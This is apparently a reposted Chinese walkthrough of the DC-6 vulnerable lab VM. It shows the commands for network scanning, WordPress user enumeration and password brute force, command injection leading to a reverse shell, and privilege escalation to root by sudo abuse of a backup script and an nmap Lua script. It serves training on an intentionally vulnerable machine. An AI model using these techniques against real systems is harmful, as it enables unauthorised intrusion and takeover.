渗透测试 - DC-6 - 练习篇

admin
admin
admin
138635
文章
114
评论
2025年3月4日15:37:46评论8 views字数 2255阅读7分31秒阅读模式

渗透测试 - DC-6 - 练习篇

描述

DC-6 是另一个专门建造的易受攻击实验室,旨在获得渗透测试领域的经验。

这不是一个过于困难的挑战,因此应该非常适合初学者。

这个挑战的最终目标是获得 root 并阅读唯一的标志。

必须具备 Linux 技能和熟悉 Linux 命令行,以及具备一些基本渗透测试工具的经验。

对于初学者,Google 可以提供很大的帮助,但您可以随时向我发送电子邮件以寻求帮助,让您重新开始。但请注意:我不会给你答案,相反,我会给你一个关于如何前进的想法。

下载地址:https://pan.quark.cn/s/c5c4c92a1f01

下载完成之后解压用vm虚拟机打开镜像,打开之后把桥接改成NAT就可以了。然后开机开搞

渗透测试 - DC-6 - 练习篇
渗透测试 - DC-6 - 练习篇
过程思路
信息收集IP地址探测
查看自己的网段
ip a
渗透测试 - DC-6 - 练习篇
扫描网段找到目标机
nmap 192.168.40.1/24
渗透测试 - DC-6 - 练习篇
攻击机:192.168.40.151
目标机:192.168.40.150
扫描目标机开放端口服务
nmap -A -sV -T4 -p192.168.40.150
渗透测试 - DC-6 - 练习篇

这里看到22端口开发ssh,ssh端口只能暴力破解开始先不考虑。优先攻击别的端口,80端口开发http服务直接访问一下

渗透测试 - DC-6 - 练习篇

访问ip加端口被转移走了,需要添加重定向

渗透测试 - DC-6 - 练习篇

正常访问

渗透测试 - DC-6 - 练习篇

由于第一次扫描端口80端口的流量被转移走了,需要再扫描一遍IP

渗透测试 - DC-6 - 练习篇

扫描发现框架版本,访问一下网站进行目录扫描

dirsearch -u http://wordy/
渗透测试 - DC-6 - 练习篇

都访问一下发现登录页面

渗透测试 - DC-6 - 练习篇

还是和之前一样用wpscan进行一次用户名枚举

wpscan --url http://wordy -e u 
渗透测试 - DC-6 - 练习篇

爆出用户名,利用用户名爆破出密码

渗透测试 - DC-6 - 练习篇

把爆出来的五个用户放到一个文件里面,用wpscan进行爆破,下载靶机的时候作者的提示

渗透测试 - DC-6 - 练习篇
渗透测试 - DC-6 - 练习篇

爆出来了mark用户的密码

渗透测试 - DC-6 - 练习篇

登录看一下,进来之后到处找找

渗透测试 - DC-6 - 练习篇

在工具里面找到一个IP工具,整数转换成IP,这种IP工具一般都是前后端交互,进入后端就可以看一下是有拦截进入后端还是没有拦截。

渗透测试 - DC-6 - 练习篇

burp抓包看看是怎么转换

渗透测试 - DC-6 - 练习篇

抓包看到没有加密什么的,改一下命令看看会不会被拦截

渗透测试 - DC-6 - 练习篇
这里看到网卡配置,说明命令注入成功,试一下nc反弹
渗透测试 - DC-6 - 练习篇
渗透测试 - DC-6 - 练习篇
成功反弹shell,开交互
python -c 'import pty;pty.spawn("/bin/bash")'
渗透测试 - DC-6 - 练习篇
进入系统找线索,到处看看,在mark用户目录里面找到一个txt文件
渗透测试 - DC-6 - 练习篇
这个文件里面提供了一个用户和密码
渗透测试 - DC-6 - 练习篇
前面扫端口的时候看见22端口是开放的ssh服务,用这个用户连接一下
渗透测试 - DC-6 - 练习篇
成功登录准备提权
渗透测试 - DC-6 - 练习篇
这里看到jens用户可以免密执行sudo命令利用这个sudo漏洞提权,查看一下文件(水平越权
渗透测试 - DC-6 - 练习篇
是一个压缩命令,说明这个文件可以正常执行
echo"/bin/bash" >> /home/jens/backups.sh #在文件里面添加命令行sudo -u jens /home/jens/backups.sh # -u是指定用执行第一条命令 将 /bin/bash 添加到文件 /home/jens/backups.sh 中。第二条命令 会让 jens 用户执行 backups.sh 脚本,这个脚本会启动一个新的 Bash shell。
渗透测试 - DC-6 - 练习篇
现在是在jens用户的shell里面,查看一下sudo的权限,看到nmap可以免密执行还是root权限的
渗透测试 - DC-6 - 练习篇
nmap提权
1. echo'os.execute("/bin/sh")' >getshell这个命令会将 'os.execute("/bin/sh")' 字符串写入到名为 getshell 的文件中。解析:echo'os.execute("/bin/sh")'echo 是用来打印输出内容的命令。这里输出的内容是 os.execute("/bin/sh"),这实际上是 Lua 脚本中的一行代码。os.execute("/bin/sh") 是 Lua 语言的一种命令,它调用系统的 Shell 解释器 /bin/sh。所以,这个命令会启动一个新的 shell 进程。通过执行这条命令,脚本将会创建一个新的 shell,通常这意味着获取对目标系统的控制。>getshell:> 是输出重定向操作符,它会把 echo 输出的内容写入文件。如果文件 getshell 已经存在,它会被覆盖。如果文件不存在,它会被创建。最终,文件 getshell 会包含 os.execute("/bin/sh") 这一行 Lua 代码。2. sudo nmap --script=getshell这条命令使用 nmap 工具运行一个脚本(在这种情况下是你刚刚创建的 getshell 脚本)。解析:sudo:sudo 命令用于以超级用户(root)的权限执行后续的命令。因为 nmap 通常需要较高权限来执行网络扫描,所以用 sudo 以获取足够的权限。nmap:nmap 是一款强大的网络扫描工具,通常用于探测网络上的设备、开放端口以及相关服务。它还支持运行自定义脚本。--script=getshell:--script 选项告诉 nmap 使用指定的脚本来执行扫描。nmap允许用户自定义脚本来扩展 nmap 功能的引擎。在这种情况下,getshell 是你创建的脚本文件,它的内容是一个 Lua 脚本,该脚本会执行一个 shell 命令,即 os.execute("/bin/sh"),试图启动一个新的 shell。
渗透测试 - DC-6 - 练习篇
开启交互,上面的命令执行之后,没有开交互时,我们输入的命令不会显示出来但是会成功执行
python -c 'import pty;pty.spawn("/bin/bash")'
渗透测试 - DC-6 - 练习篇
开完交互成功拿到flag,不开交互也可以拿到,但是看的不舒服
渗透测试 - DC-6 - 练习篇

原文始发于微信公众号(信安一把索):渗透测试 - DC-6 - 练习篇

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月4日15:37:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透测试 - DC-6 - 练习篇https://cn-sec.com/archives/3794413.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息